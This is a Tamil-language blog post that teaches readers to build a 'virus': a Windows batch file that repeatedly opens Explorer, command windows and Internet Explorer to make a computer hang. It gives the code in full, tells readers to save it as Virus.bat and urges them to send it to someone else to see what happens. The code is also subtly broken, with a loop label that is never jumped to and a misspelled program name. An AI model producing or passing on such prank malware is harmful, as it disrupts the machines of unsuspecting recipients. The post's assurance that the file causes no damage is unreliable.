Virus ஒன்று செய்வோமா...???


Virus ஒன்று செய்வோமா...???

இது கொஞ்சம் பெரிய விளையாட்டு. காரணம் இது Computer Struck செய்யும். (பாதுகாப்பாக கையாளவும் :p)
இது தான் மேட்டர். இந்த Codes மூலம் செய்யும் File யாராவது Open செய்தால் Internet Explorer, My  Documents போன்றவை தொடர்ந்து Open ஆவும். இதனால் கம்ப்யூட்டர் Struck ஆகும். அவ்வலவு தான் பெரிதாக ஒன்றும் இல்லை. இதனால் கணினிக்கு எந்த பாதிப்பும் இல்லை.
மேலும் எத்தனை முறை Open ஆகிறது என்பதையும் Control பண்ண முடியும்.
வேறு என்ன வேனும் Try பண்ணி தான் பாருங்களேன்.



ஓகே ஓகே விஷயத்துக்கு வாறன்.
முதலில் Notepad Open செய்து கீழுள்ள Codes Type செய்யவும். (பாஸ் Copy பண்ணி Paste பண்ணுங்க Easy யா இருக்கும்)


@echo off
:A
start dir
start command
start iexpore.exe
start run
start explorer


நான் முன்னர் சொன்னது போன்று Open ஆகின்ற எண்ணிக்கையை உங்கள் விருப்பம் போன்று மாற்றிக்கொள்ளலாம்.
இதோ அதற்கான தீர்வு.

மேலே Codes இல் start dir 
 என்ற இடத்தில் இருந்து தொடங்குவதை உங்கள் விருப்பத்திற்கு ஏற்றால் போல் Copy - Paste செய்து கொள்ளலாம். எத்தனை முறை Open ஆகிறது என்பதை இது தான் தீர்மானிக்கும்.
உதாரணாமாக :

@echo off
:A
start dir
start command
start iexpore.exe
start run
start explorer
start dir
start command
start iexpore.exe
start run
start explorer

இரண்டு முறை Open ஆகுவதற்கு மேலுள்ளதுபோல இரண்டு முறை Copy - Paste செய்து கொள்ளுங்கள். 

 Copy - Paste செய்யும் எண்ணிக்கை அதிகரிக்கும் பொது கணினி Struck ஆகும் வீதமும் அதிகரிக்கும்.





இறுதியில் Save செய்யும் பொது  உங்களுக்கு விருப்பமான பெயரை Type செய்து .bat என Save செய்து கொள்ளுங்கள்.(Exa: Virus.bat).


இப்போது Virus முடிந்தது. என்ன நடக்கிறது என்று இன்னொருவருக்கு அனுப்பி பாருங்க.
உங்களுக்கே Test செய்ய வேண்டுமாயின் குறைந்த அளவு Copy - Paste செய்து Try செய்து பார்க்கலாம்.